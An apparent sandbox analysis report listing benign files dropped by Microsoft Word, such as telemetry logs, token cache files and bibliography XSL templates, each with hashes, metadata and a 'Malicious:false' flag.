                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636866" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2278
                                    Entropy (8bit):3.8460872679742852
                                    Encrypted:false
                                    SSDEEP:48:uiTrlKxsxxgSxl9Il8uH+zlfbKB4aU30xDCDPO4c6lyV+l22d1rc:v9Yh+z9bWUe4OiyHt
                                    MD5:8017B9E6C19C38BA8B6851A559D40B9F
                                    SHA1:10929965EF67CB68A4C7FB0175D9BDDED0EE5788
                                    SHA-256:0E7C7979B6F93C4C4F6923A97C9F81B3A555D1758456E0B9D7E5FE5A84B7AD2E
                                    SHA-512:0C71D10D512E6AC47FD9770F0BB43997E09D60DD9E7797B33D4F49219F971BAC4A932EF426E1A19D4C3F3D91978C31CB1C8AD5D2F6D5C98983EF5CDA0EF50493
                                    Malicious:false
                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.B.0.K.2.l.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.T.a.0.N.3.

                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2684
                                    Entropy (8bit):3.9130982548486224
                                    Encrypted:false
                                    SSDEEP:48:uiTrlKxJx/yxl9Il8uHFqIYKs+wqtl31aEVigZVlkSh4oG1QWd/vc:0WYhUfVS1lVLVlkSuojz
                                    MD5:336EBC0EBD2DC85AFB1E322F5453224E
                                    SHA1:C73C2695CCFBCA88DF8D564254E5E5B411AACA99
                                    SHA-256:615975DA620CDFFEE0939A05477DB782D200AE63EE634034D85E2E803448A6A6
                                    SHA-512:6BC96F9D4C619D3AFF59AAD60ACAFDD2D91C8BE25C56F2228D0FE61F0E500350B572B22A5483EBCD76BA4846F495645B1DF1587356FF8DCBAFBD16A3E011CE30
                                    Malicious:false
                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".h.0.0.A.Q.z.J.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.T.a.0.N.3.

                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4542
                                    Entropy (8bit):3.99891190495304
                                    Encrypted:false
                                    SSDEEP:96:5oYhDcTejsudwtKgnnodOCR2ifoqaqvZizzjhbDZcUX+K:ieGis7ttnnoX2ifNaiZizlDyc
                                    MD5:5D58C850DEA929C732C971D89E692A25
                                    SHA1:4FBE9CA4C8336BDF9F56BF2CA36A111A91D44604
                                    SHA-256:B6F6E1A22BA2CAED8597F71740D1E154E2F33800AE3BBA7A15EF891C40AA2C5D
                                    SHA-512:4C71A30582D258692EAC6C90902ABFF32EBF4E1FD6F6987F0E12FAC6AD505F8CFB9CD23A53A58B7062424D89464F84002662E41D0FCA9EE6A6F569E601647CA1
                                    Malicious:false
                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.E.8.p.E.W.F.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.e.T.a.0.N.3.

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{37246C0A-CAD0-4496-BB38-46EB6C62619A}.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2526
                                    Entropy (8bit):3.697045615801272
                                    Encrypted:false
                                    SSDEEP:24:44Enc9A02WMCtb4IkcRwdt/SCUAot4In3c6FM5jKBuqt0ZLsh:sncOAMCV1hRwrUAoKKcFjKMflsh
                                    MD5:A2D3CD5511089530920A870694F1024C
                                    SHA1:7CE0704A7C5EB0071498A0B820BEE38FB37F6D19
                                    SHA-256:389E3B38B89E5DEC101C490EEFDBF635642E8CFE6954D29778070FAD9718C056
                                    SHA-512:5ED1DE7E836F2C271C8F182D33DC576A461A31000FD88F9406AFF4D7FD21FBFC954C72D39F6DF70627FB5E7F043D710907468AA0B8AD77B2B51C01B70623495C
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734535404036732400_E0D17D01-5636-4B1F-B917-5E8F8067BDEC.log

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:ASCII text, with very long lines (1982), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.01431233863609655
                                    Encrypted:false
                                    SSDEEP:768:xVTV4s0/wXra8hLSprtwjkDZ0Zh1B8xUuf5K2XB+i:xVTV4s047a8xu2jkDZ0L1B8T5K2XBh
                                    MD5:791AA4BA39043F4B0F973EA10FFEB280
                                    SHA1:2A29F1EBFBBB26EA719DAB323112EB6EF7B0C3E6
                                    SHA-256:F6E4FA56ECA50D0DDCEE40CB43E205D7A5B0A541EDD596A711CC2BE6F6FB09B3
                                    SHA-512:A27558803250811D50B35344DCC6209684D17C5C9447D831E62A060CB901360C294A34271AC049EE24CBE664435DFD4034308D49C6E5969D01A90D81E1B74B7B
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 15:23:24.919.WINWORD (0x10D4).0x1A04.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-18T15:23:24.919Z","Contract":"Office.System.Activity","Activity.CV":"AX3R4DZWH0u5F16PgGe97A.7.1","Activity.Duration":336,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/18/2024 15:23:24.935.WINWORD (0x10D4).0x1A04.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-18T15:23:24.935Z","Contract":"Office.System.Activity","Activity.CV":"AX3R4DZWH0u5F16PgGe97A.7","Activity.Duration":4172,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD

                                    C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734535404037311800_E0D17D01-5636-4B1F-B917-5E8F8067BDEC.log

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\TCD9AD1.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.538396048757031
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                    MD5:149948E41627BE5DC454558E12AF2DA4
                                    SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                    SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                    SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9AD1.tmp\sist02.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):250983
                                    Entropy (8bit):5.057714239438731
                                    Encrypted:false
                                    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                    MD5:F883B260A8D67082EA895C14BF56DD56
                                    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Local\Temp\TCD9AD2.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):288
                                    Entropy (8bit):3.523917709458511
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                    MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                    SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                    SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                    SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9AD2.tmp\chicago.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):296658
                                    Entropy (8bit):5.000002997029767
                                    Encrypted:false
                                    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                    MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Local\Temp\TCD9AD3.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):3.5161159456784024
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                    MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                    SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                    SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                    SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9AD3.tmp\turabian.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):344303
                                    Entropy (8bit):5.023195898304535
                                    Encrypted:false
                                    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                    MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                    C:\Users\user\AppData\Local\Temp\TCD9AE6.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.5280239200222887
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                    MD5:877A8A960B2140E3A0A2752550959DB9
                                    SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                    SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                    SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9AE6.tmp\gb.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):268317
                                    Entropy (8bit):5.05419861997223
                                    Encrypted:false
                                    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                    MD5:51D32EE5BC7AB811041F799652D26E04
                                    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Local\Temp\TCD9AF6.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):260
                                    Entropy (8bit):3.4895685222798054
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                    MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                    SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                    SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                    SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9AF6.tmp\VaryingWidthList.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3075
                                    Entropy (8bit):7.716021191059687
                                    Encrypted:false
                                    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                    MD5:67766FF48AF205B771B53AA2FA82B4F4
                                    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                    Malicious:false
